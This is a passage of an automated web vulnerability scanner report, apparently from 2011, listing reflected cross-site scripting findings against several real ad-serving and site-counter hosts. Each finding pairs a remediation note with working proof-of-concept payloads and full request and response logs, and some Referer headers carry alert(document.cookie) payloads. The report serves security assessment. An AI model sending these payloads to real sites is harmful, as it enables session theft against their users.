Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/728x90/jx/ss/a/L29/113697063/Top1/USNetwork/BCN2010110676_019_Dominos/dominos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Thu, 31 Mar 2011 19:09:38 GMT
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E488BCE65F286EBF3A7BB11CAB6597D2; Path=/
Connection: keep-alive
Content-Length: 8628


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/
...[SNIP]...
ml/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=511194632cfa"-alert(1)-"c2cd4bebbb3&chanId=237635541&placementId=59579605&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=funct
...[SNIP]...

2.27. http://pixel.adsafeprotected.com/jspix [chanId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the chanId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 831ba"-alert(1)-"3aa92e58b1c was submitted in the chanId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5111946&chanId=237635541831ba"-alert(1)-"3aa92e58b1c&placementId=59579605&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/728x90/jx/ss/a/L29/113697063/Top1/USNetwork/BCN2010110676_019_Dominos/dominos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Thu, 31 Mar 2011 19:09:37 GMT
Server: Apache-Coyote/1.1
Connection: keep-alive
Content-Length: 8628


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/
...[SNIP]...
6934646f4141767949?;pc=OAS_20142018;ord=113697063?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5111946&chanId=237635541831ba"-alert(1)-"3aa92e58b1c&placementId=59579605&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typ
...[SNIP]...

2.28. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aff37"-alert(1)-"9b01b9216fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126&aff37"-alert(1)-"9b01b9216fd=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/728x90/jx/ss/a/L29/113697063/Top1/USNetwork/BCN2010110676_019_Dominos/dominos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Thu, 31 Mar 2011 19:09:37 GMT
Server: Apache-Coyote/1.1
Connection: keep-alive
Content-Length: 8631


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/
...[SNIP]...
ord=113697063?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126&aff37"-alert(1)-"9b01b9216fd=1",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if
...[SNIP]...

2.29. http://pixel.adsafeprotected.com/jspix [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the placementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f371e"-alert(1)-"e6c614f1599 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605f371e"-alert(1)-"e6c614f1599&pubId=1036126 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/728x90/jx/ss/a/L29/113697063/Top1/USNetwork/BCN2010110676_019_Dominos/dominos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Thu, 31 Mar 2011 19:09:37 GMT
Server: Apache-Coyote/1.1
Connection: keep-alive
Content-Length: 8628


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/
...[SNIP]...
c=OAS_20142018;ord=113697063?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605f371e"-alert(1)-"e6c614f1599&pubId=1036126",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){
...[SNIP]...

2.30. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcb2c"-alert(1)-"c3af90a581a was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=134&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126dcb2c"-alert(1)-"c3af90a581a HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/728x90/jx/ss/a/L29/113697063/Top1/USNetwork/BCN2010110676_019_Dominos/dominos_cpc_728.html/726348573830316934646f4141767949?;pc=OAS_20142018;ord=113697063?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Thu, 31 Mar 2011 19:09:37 GMT
Server: Apache-Coyote/1.1
Connection: keep-alive
Content-Length: 8628


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.106;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/multiply2/ros2/
...[SNIP]...
;ord=113697063?",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=134&advId=2356384&campId=5111946&chanId=237635541&placementId=59579605&pubId=1036126dcb2c"-alert(1)-"c3af90a581a",
   debug : "false"
};

(function(){var f="3.6";var p=(adsafeVisParams.debug==="true");var z=2000;var A={INFO:"info",LOG:"log",DIR:"dir"};var k=function(F,H,D){if(typeof H==="undefined"){H=A.INFO;}if(p
...[SNIP]...

2.31. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 9a9a2<script>alert(1)</script>c5a5a91f82b was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1301598611269&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-8416051461012614&slotname=notfound728x909a9a2<script>alert(1)</script>c5a5a91f82b&page_slots=notfound728x90&cust_params=AnonNamed%3Danon%26Gender%3D%26Age%3D%26owner%3Dme%26DaysMember%3Dn%252Fa%26GroupCat%3Dn%252Fa%26seller%3D0%26selfcat%3D0%26mpcat%3D0%26Ad%3DUS728x90anon&cookie_enabled=1&cdm=multiply.com&url=http%3A%2F%2Fmultiply.com%2Ffavicon.ico6b186%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E04ce938265c&ref=http%3A%2F%2Fmultiply.com%2Ffavicon.ico6b186%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E04ce938265c&lmt=1301616611&dt=1301598611270&cc=100&ad_type=text_image&channel=8067052223&biw=1017&bih=933&ifi=1&ifk=2684288166&adk=859106694&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=588381324.1301598611&ga_sid=1301598611&ga_hid=711570446 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://multiply.com/gam-iframe/notfound/728x90?pt=google_ad_type:text_image&pt=google_ad_channel:8067052223
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMedia=Coun%3ANA/Postal%3ANA/; TMediaISP=SoftLayer%20Technologies; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __utmz=251550727.1300542524.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=251550727.1167224488.1300542524.1300542524.1300542524.1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 31 Mar 2011 19:11:22 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
Content-Length: 1440
X-XSS-Protection: 1; mode=block

GA_googleSetAdContentsBySlotForSync({"notfound728x909a9a2<script>alert(1)</script>c5a5a91f82b":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

2.32. http://s29.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s29.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c20'%3balert(1)//e1a306d33d4 was submitted in the site parameter. This input was echoed as e2c20';alert(1)//e1a306d33d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s29yodalande2c20'%3balert(1)//e1a306d33d4 HTTP/1.1
Host: s29.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 31 Mar 2011 19:26:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7320
Content-Type: application/x-javascript
Expires: Thu, 31 Mar 2011 19:36:22 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s29yodalande2c20';alert(1)//e1a306d33d4', 's29.sitemeter.com', '');

var g_sLastCodeName = 's29yodalande2c20';alert(1)//e1a306d33d4';
// ]]>
...[SNIP]...

2.33. http://sm8.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sm8.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2849'%3balert(1)//d276b6a1a15 was submitted in the site parameter. This input was echoed as c2849';alert(1)//d276b6a1a15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=sm8egotasticc2849'%3balert(1)//d276b6a1a15 HTTP/1.1
Host: sm8.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://egotastic.com/favicon.ico63db6%3Cscript%3Ealert(document.cookie)%3C/script%3E72d061924d9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 31 Mar 2011 19:26:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Thu, 31 Mar 2011 19:36:38 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('sm8egotasticc2849';alert(1)//d276b6a1a15', 'sm8.sitemeter.com', '');

var g_sLastCodeName = 'sm8egotasticc2849';alert(1)//d276b6a1a15';
// ]]>
...[SNIP]...

2.34. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wn.com
Path:   /41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload 685d6><img%20src%3da%20onerror%3dalert(1)>6d5c58ed3a was submitted in the REST URL parameter 1. This input was echoed as 685d6><img src=a onerror=alert(1)>6d5c58ed3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /41ff8%22%3E%3Cimg_src685d6><img%20src%3da%20onerror%3dalert(1)>6d5c58ed3a=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/4
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.2.10.1301599015; __qca=P0-176382732-1301599015354

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:17:32 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 63034


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<img src685d6><img src=a onerror=alert(1)>6d5c58ed3a=a onerror=alert("xss")>
...[SNIP]...

2.35. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a2cf'%3bc6b65aada63 was submitted in the REST URL parameter 1. This input was echoed as 3a2cf';c6b65aada63 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /41ff8%22%3E%3Cimg_src3a2cf'%3bc6b65aada63=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/4
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.2.10.1301599015; __qca=P0-176382732-1301599015354

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:18:21 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 63080


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<img_src3a2cf';c6b65aada63=a_onerror=alert_xss_>
...[SNIP]...

2.36. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aee40<a%20b%3dc>5f91e2b145b was submitted in the REST URL parameter 1. This input was echoed as aee40<a b=c>5f91e2b145b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /aee40<a%20b%3dc>5f91e2b145b=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/4
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.2.10.1301599015; __qca=P0-176382732-1301599015354

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:18:38 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 62191


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<a b=c>5f91e2b145b=a onerror=alert("xss")>f8c4a59ad81" rel="alternate" type="application/rss+xml" title="Aee40<a B=c>5f91e2b145b=a Onerror=alert Xss >
...[SNIP]...

2.37. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
Path:   /41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f063"%3bc56cf0c073b was submitted in the REST URL parameter 1. This input was echoed as 7f063";c56cf0c073b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7f063"%3bc56cf0c073b=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 HTTP/1.1
Host: wn.com
Proxy-Connection: keep-alive
Referer: http://burp/show/4
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=35; __unam=6e7de7f-12f0d58c487-3a11fc86-1; __utmz=132968776.1301599015.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=132968776.437757365.1301599015.1301599015.1301599015.1; __utmc=132968776; __utmb=132968776.2.10.1301599015; __qca=P0-176382732-1301599015354

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 19:18:16 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 62615


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script
...[SNIP]...
<!--
window.playlist_name = "7f063";c56cf0c073b=a onerror=alert("xss")>
...[SNIP]...

2.38. http://wn.com/41ff8%22%3E%3Cimg_src=a_onerror=alert(%22XSS%22)%3Ef8c4a59ad81 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://wn.com
